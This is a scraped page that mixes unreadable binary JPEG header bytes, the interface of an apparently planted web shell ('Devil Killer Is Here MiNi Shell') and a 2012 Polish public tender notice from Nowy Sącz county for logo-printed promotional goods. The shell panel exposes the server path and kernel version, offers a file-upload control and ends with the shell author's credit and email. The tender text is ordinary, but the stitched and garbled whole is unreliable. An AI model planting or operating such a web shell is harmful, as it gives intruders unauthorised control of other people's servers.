JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120620/211650-N-2012.html

<p class="kh_header"><b>Nowy Sącz: ZP.272.12.2012 Zamówienie na wykonanie i dostawę materiałów promocyjnych z nadrukiem logo/herbu powiatu nowosądeckiego</b><br>
<b>Numer ogłoszenia: 211650 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego , ul. Jagiellońska 33, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141600, faks 18 4141700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.nowy-sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP.272.12.2012 Zamówienie na wykonanie i dostawę materiałów promocyjnych z nadrukiem logo/herbu powiatu nowosądeckiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostawa materiałów promocyjnych z nadrukiem logo/herbu powiatu nowosądeckiego:

1) komplet metalowych przyborów do pisania - pióro kulkowe + długopis - model 1 -
wg wizualizacji i parametrów:
- model V1427-03, V1427-04, V1427-05 lub równoważne: korpus metalowy, błyszczący, elementy wykończeniowe/skuwka metalowe błyszczące srebrne,
- ilość: 300 kpl., w tym w kolorach: srebrno-czarnym - 100 kpl., srebrno-czerwonym - 100 kpl., srebrno-granatowym - 100 kpl.,
- przybory do pisania umieszczone w kartonowym czarnym lub srebrnym etui z welurową wkładką, wymiary etui ( ? 1%): 16,5 mm x 6 mm x 0,9 mm, 
- znakowanie laserowe na obu przyborach do pisania - zgodnie z proporcjami na wizualizacji. 
 
2) komplet metalowych przyborów do pisania - pióro wieczne + długopis - model 2 -wg wizualizacji i parametrów:
- model MIRRO lub równoważny: lśniący grafitowy korpus i zatyczka; błyszczący chromowany klip, stalówka i pierścienie,
- ilość: 500 kpl.,
- przybory do pisania umieszczone w jednostkowym kartonowym czarnym lub srebrnym etui z welurową wkładką,
- znakowanie laserowe na obu przyborach do pisania - zgodnie z proporcjami na wizualizacji. 

3) długopis metalowy - wg wizualizacji i parametrów:
- model Sirius lub równoważny: metalowy, kolorowy korpus aluminiowy, końcówki srebrne, klip metalowy, srebrne ozdobne wyżłobione dwa ringi, mechanizm obrotowy, długość 142 mm (? 1%), szerokość 11 mm (? 1%),
- ilość: 2000 szt., w tym w kolorach: zielonym - 500 szt., czerwonym - 100 szt., niebieskim - 100 szt., szarym - 100 szt., grafitowym - 100 szt., pomarańczowym - 100 szt.,
- znakowanie laserowe na korpusie długopisu - zgodnie z proporcjami na wizualizacji.

4) koszulka bawełniana czarna wg wizualizacji i parametrów:
- model JHK TSRA 150 lub równoważny, gramatura bawełny 150 g, 
- podwójny szew przy rękawach, na ramionach i wzdłuż brzegu dolnego, brak bocznych szwów, ściągacz przy szyi wzmocniony lycrą, 
- ilość 2000 szt. w rozmiarach: S - 400 szt., M - 800 szt., L - 700 szt., XL - 100 szt., 
- nadruk w dwóch miejscach - z przodu koszulki 2 kolory i z tyłu koszulki 3 kolory - zgodnie z proporcjami na wizualizacji,
- koszulka pakowana indywidualnie w woreczek foliowy PP przezroczysty zaklejany.

5) torba papierowa z herbem wg wizualizacji i parametrów:
- ilość 2000 szt., 
- rozmiar: szerokość 280 mm (? 10 mm), głębokość 130 mm (? 10 mm), wysokość 340 mm (? 10 mm), 
- papier biały powlekany min. 190 g, 
- uszlachetnienie folia matowa, 
- druk jednostronny 2 kolory Pantone, na zewnątrz pole zadruku 100% - zgodnie z proporcjami na wizualizacji,
- uchwyty krótkie 2 x 50 cm (? 10%), ze sznurka PP z zabezpieczonymi końcówkami, kolor złoty, przewlekany przez otwory, grubość nie mniejsza niż 5 mm, 
- dno torby usztywnione tekturą min. 450 g, 
- góra torby usztywniona tekturą min. 800 g.
 
6) torba papierowa z logo wg wizualizacji i parametrów:
- ilość 2000 szt., 
- rozmiar: szerokość 340 mm (? 10 mm), głębokość 130 mm (? 10 mm), wysokość 340 mm (? 10 mm), 
- papier biały powlekany 190 g, 
- uszlachetnienie folia matowa + wybiórczo lakier UV, 
- druk dwustronny full color, od wewnątrz torba jasnozielona - pole zadruku 100%,
- uchwyty krótkie 2 x 50 cm (? 10%), ze sznurka PP z zabezpieczonymi końcówkami,  kolor biały, przewlekany przez otwory, grubość nie mniejsza niż 5 mm,
- dno torby usztywnione tekturą min. 450 g, 
- góra torby usztywniona tekturą min. 800 g.
 
7) podstawka pod telefon komórkowy wg wizualizacji i parametrów:
- wykonana z tworzywa sztucznego z powierzchnią antypoślizgową koloru czarnego, pasuje do wszystkich modeli telefonów,
- wymiary (? 1%): 12,5 cm x 6,0 cm x 1,5 cm, 
- opakowanie indywidualne w woreczek foliowy,
- ilość 1000 szt. w kolorze białym,
- nadruk 1 kolor - zgodnie z proporcjami na wizualizacji
 
8) pendrive o pojemności 4GB wg wizualizacji i parametrów:
- pendrive w obudowie metalowo-gumowej (korpus wykonany z kolorowej gumy, 
część obrotowa - metalowa),
- pojemność 4 GB, 
- ilość 1000 szt., w tym: w kolorze jasnozielonym 400 szt., niebieskim 100 szt., czerwonym - 100 szt., pomarańczowym - 100 szt., czarnym - 100 szt., białym - 200 szt.
- znakowanie laserowe na obrotowej metalowej części pendriva - zgodnie z proporcjami na wizualizacji.

9) parasol długi automatyczny wg wizualizacji i parametrów:
- z metalową laską, plastikowymi kolcami i uchwytem, dwuwarstwowym poszyciem z poliestru w dwóch kolorach, wierzch w kolorze czarnym, spód kolorowy, z zapięciem na rzep, rozmiar: O103 cm (? 1%), 
- ilość 300 szt., w tym w kolorze: czarno-szarym 150 szt., czarno-czerwonym 40 szt., czarno-niebieskim 30 szt., czarno-żółtym 50 szt., czarno-zielonym 30 szt.,
- nadruk 1 kolor - zgodnie z proporcjami na wizualizacji.
 
10) kubek ceramiczny wg wizualizacji i parametrów:
- kubek model Apollo lub równoważny: z zewnątrz biały, wewnątrz kolorowy, kształt kubka - węższy na dole, szerszy u góry,
- wymiary (? 1%): średnica 80/55 mm, wysokość 118 mm, pojemność 300 ml, 
- ilość 500 szt., w tym: biało-limonkowy 200 szt., biało-czerwony 200 szt., biało-niebieski 100 szt.
- znakowanie: nadruk 3 kolory Pantone na zewnątrz kubka w dwóch miejscach - zgodnie z proporcjami na wizualizacji,
- kubek pakowany indywidualnie w pudełko kartonowe białe z wycięciem.

11) pompon jabłuszko wg wizualizacji i parametrów:
- ilość 2000 szt., w tym w kolorze: czerwonym 1000 szt., zielonym 1000 szt.,
- stopki samoprzylepne zielone, 
- wstążka biała tekstylna (nie sztywna), 
- nadruk na wstążce 1 kolor - zgodnie z proporcjami na wizualizacji.

12) torba ekologiczna z PCV i poliestru wg wizualizacji i parametrów:
- z wyciętymi owalnymi rączkami z pvc i poliestru 600D,
- ilość 750 szt., w tym: jasnozielone - 250 szt. białe - 250 szt., czarne - 250 szt.
- rozmiar: szerokość 400 mm (? 10 mm), głębokość (spód i boki) 80 mm (? 10 mm), wysokość 420 mm (? 10 mm), 
- na przodzie torby nadruk 2 kolory Pantone (na czarnej torbie nadruk w kolorach białym i jasnozielonym, na białej torbie nadruk w kolorach czarnym i jasnozielonym, na jasnozielonej torbie nadruk w kolorach białym i czarnym), tył torby bez nadruku - zgodnie z proporcjami na wizualizacji.

13) torba ekologiczna lniana z krótkimi uszami i szerokim dnem wg wizualizacji i parametrów:
- torba z tkaniny len 100%,
- ilość 1000 szt., 
- rozmiar: szerokość 360 mm (? 10 mm), głębokość (spód i boki) 100 mm (? 10 mm), wysokość 400 mm (? 10 mm), 
- na przodzie torby z prawej i lewej strony nadruk wielokolorowy (7 kolorów Pantone), tył torby bez nadruku - zgodnie z proporcjami na wizualizacji.
 
UWAGA!!!: Termin wykonania zamówienia:

- pierwszy etap - koszulki, torby papierowe z herbem, torby papierowe z logo - dostawa w terminie do 2 tygodni od dnia podpisania umowy z wybranym Wykonawcą;

- drugi etap - komplety pióro+długopis, długopisy, podstawki pod komórkę, parasole, kubki, pompony, torby z pcv, torby lniane, pendrivy - dostawa w terminie do 4 tygodni od dnia podpisania umowy z wybranym Wykonawcą.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia
wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający na
potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i
oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy i doświadczenia. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie art.
22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia
oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga
złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące sytuacji ekonomicznej i finansowej. Zamawiający na potwierdzenie spełniania tego warunku udziału w postępowaniu wymaga złożenia oświadczenia w trybie art.
22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nowym Sączu, Zespół ds. Zamówień Publicznych, pok. 320 ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2012 godzina 12:00, miejsce: Starostwo Powiatowe w Nowym Sączu Kancelaria Administracyjna pok. 113 ul. Jagiellońska 33, 33- 300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com